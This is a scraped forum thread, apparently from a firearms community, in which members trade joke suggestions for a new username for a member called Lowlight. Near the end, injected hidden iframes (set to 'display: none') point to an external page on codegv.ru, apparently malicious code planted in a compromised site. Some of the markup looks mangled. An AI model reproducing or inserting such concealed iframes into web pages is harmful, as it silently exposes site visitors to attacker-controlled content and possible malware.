• Watch Out for Scammers!

We've now added a color code for all accounts. Orange accounts are new members, Blue are full members, and Green are Supporters. If you get a message about a sale from an orange account, make sure you pay attention before sending any money!

Lowlight needs a new uesr name

diverdon

Constitutionalist, by choice
Minuteman
  • Dec 21, 2011
    WNY
    If I read the thread about joining up with Scout media right someone over there already has Lowlight's user name. I propose that we help Lowlight pick a new user name.

My suggestion: Bigfrank

"Subduedluminescence"

With as long as Frank has been using that sn, I would probably go with SH_Lowlight.

What a piece of shit to steal the mans name!! I say ban the other guy for taking the name and give Frank back his well earned name!!!

I am going to use "Crooked Barrel" if my name is already taken but if LL wants it he can have it.

Sent from my iPhone using Tapatalk

Maggot's in, with:

"Sweetness"

EddieG1979
    Because there is no way to get anymore Operator as $#@!, and everyone can only hope to achieve that level of bad-ass-nes when they grow up. Given that Eddie is probably in Syria or Iraq dispatching Tangos at distances of over 1 mile with his Tactical Rifles Stick of Death, I am sure that Frank could get away with using his name for at least a while until Eddie shows back up in the US to train some Tier 1 Operators, at which time Frank will have to beg for forgiveness!

Commandant oaf

This was to be in all capitals but for some reason when I post it changes

Last edited:
    g6mwGpk.jpg

Just add your first initial Frank....Flowlight.

On second thought....since there has been so much crying about the move how about....Mom.

Last edited:
    If I read the thread about joining up with Scout media right someone over there already has Lowlight's user name. I propose that we help Lowlight pick a new user name.

My suggestion: Bigfrank

That's not what his wife and girlfriend told me

How about LoLolight. "Lolo" means grandpa in Tagalog. Just kiddin' Frank! :)

Or "Faible Lumière." The French Lowlight. Expert at retreat and surrender...I mean escape and evade.

Last edited:
    Lowlight needs a new uesr name

2pac is dead. Illuminati is up for grabs...

Sent from my iPhone using Tapatalk

I thought his A.K.A. was TrunkHooker.

<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Has Master Blaster been taken yet?

<iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Maybe.....

Attachments

• lord-farquaad-_shrek_ - Copy - Copy.jpg
      lord-farquaad-_shrek_ - Copy - Copy.jpg
      92.2 KB · Views: 12